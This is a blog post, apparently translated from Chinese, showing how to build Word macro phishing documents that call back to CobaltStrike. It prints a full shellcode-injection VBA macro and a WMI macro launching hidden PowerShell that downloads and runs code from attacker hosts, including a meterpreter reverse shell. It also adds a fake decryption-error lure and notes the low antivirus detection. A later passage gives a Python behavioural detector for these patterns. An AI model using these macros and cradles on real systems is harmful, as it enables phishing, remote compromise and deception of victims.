
Musings on Phishing Documents (Part 1)

2020-10-26 09:35



This article briefly introduces phishing with macro code and making the macro call back to CobaltStrike. CobaltStrike ships with a macro phishing feature, which can be created with the following steps:


Attacks --> Packages --> MS Office Macro



The generated content is roughly as follows:


Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' The Win32 APIs are imported under innocuous aliases (CreateStuff, AllocStuff, ...).
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' CobaltStrike fills in the byte array here; it is elided on the page.
    myArray = Array(shellcode)
    ' Pick the 32-bit rundll32.exe as the host process (SysWOW64 on 64-bit Windows).
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
    Else
        sProc = Environ("windir") & "\System32\rundll32.exe"
    End If

    ' Start rundll32.exe with no arguments, suspended (dwCreationFlags = 4).
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' Allocate an RWX page in the child (MEM_COMMIT, PAGE_EXECUTE_READWRITE), copy the
    ' bytes in one at a time and run them on a new remote thread.
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub


Next, we build a simple phishing document in a different way. First create a new Word document, then open the macro editing page.


Type any name for the macro and you arrive at the VB editor.



This example uses a PowerShell-based callback for the macro attack. To write our macro we can borrow from already public code (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode), which uses WMI to start the process.

After trimming it we get the macro code below; in fact only the scheduled-task part has been removed.



Sub Auto_Open()
    ' With the scheduled-task persistence (ExecutePersist) removed, Execute is called directly.
    Execute
End Sub

Public Function Execute() As Variant
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    ' Win32_ProcessStartup instance with ShowWindow = 0 so no console window appears.
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    ' Win32_Process.Create launches PowerShell via WMI, so the child is not parented by Word.
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
End Function


His macro's PowerShell command defaults to calling Invoke-Shellcode, i.e. the following:


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force


Our CS does not need all of that; it can call back directly through PowerShell, as follows:


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))"


Substitute it in the corresponding place, paste it into the editor, run it, and a session comes in.



To make the document look more convincing, a pop-up dialog can be added, such as the following.



The code is as follows:


Result = MsgBox("The document cannot be decrypted.", vbAbortRetryIgnore + vbCritical, "Please contact 360.")



Now let's look at the detection rate:




Because the macro contains no shellcode at all, it fares very well against static scanning.
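Since neither macro carries shellcode for a static scanner to match, detection has to be behavioural. As an added example, not from the original post, here is a small Python classifier run over constructed Sysmon-style process-creation records; it flags the two patterns the macros on this page produce: an Office process launching an argument-less rundll32.exe (the CobaltStrike injection macro) and a powershell.exe download cradle whose parent is WmiPrvSE.exe (the WMI macro). The record field names and the sample records are assumptions.

```python
import re

# Constructed, Sysmon-style process-creation records (not real telemetry).
# Record 0 mirrors the CobaltStrike macro (Office -> argument-less rundll32.exe);
# record 1 mirrors the WMI macro (parent is WmiPrvSE.exe, not the Office process).
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
                ".downloadstring('http://192.168.2.114:8011/a'))\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SPAWN_TARGETS = {"rundll32.exe", "powershell.exe", "cmd.exe", "wscript.exe"}
# Download-cradle and hidden-window markers present in both command lines on this page.
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|Invoke-Shellcode|-nop\b|-w(?:indowstyle)?\s+hidden", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the list of detection names a single process-creation record triggers."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    hits = []
    if parent in OFFICE and image in SPAWN_TARGETS:
        hits.append("office_spawns_lolbin")
    # rundll32.exe with no "DLL,EntryPoint" argument does nothing legitimate; it is
    # the empty host process that the injection macro fills with shellcode.
    if image == "rundll32.exe" and len(cmd.split()) == 1:
        hits.append("rundll32_no_args")
    if image == "powershell.exe":
        if parent == "wmiprvse.exe":      # Win32_Process.Create re-parents the child
            hits.append("powershell_via_wmi")
        if CRADLE.search(cmd):
            hits.append("download_cradle")
    return hits


def scan(events):
    """Map record index -> detections, keeping only the records that fired."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}
```

The argument-count check assumes the rundll32 path itself contains no spaces, which holds for the Windows system directories used here.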


Closing notes


In real engagements this kind of PowerShell-invoking method is certainly not the best choice; it is offered here only as an idea. A certain "360" security suite, for example, already locks PowerShell down so tightly that it cannot be used for the callback at all. In the following articles the method will be modified for better generality.


Reference: https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery


Source: https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247485697&idx=1&sn=e5cf549c6abd2db2bea2de2ece2f386a&chksm=fb183a33cc6fb325a5ca4770a479a3764368e0bf27c881d22cc3583de54390676c7b0973483c&scene=27&k
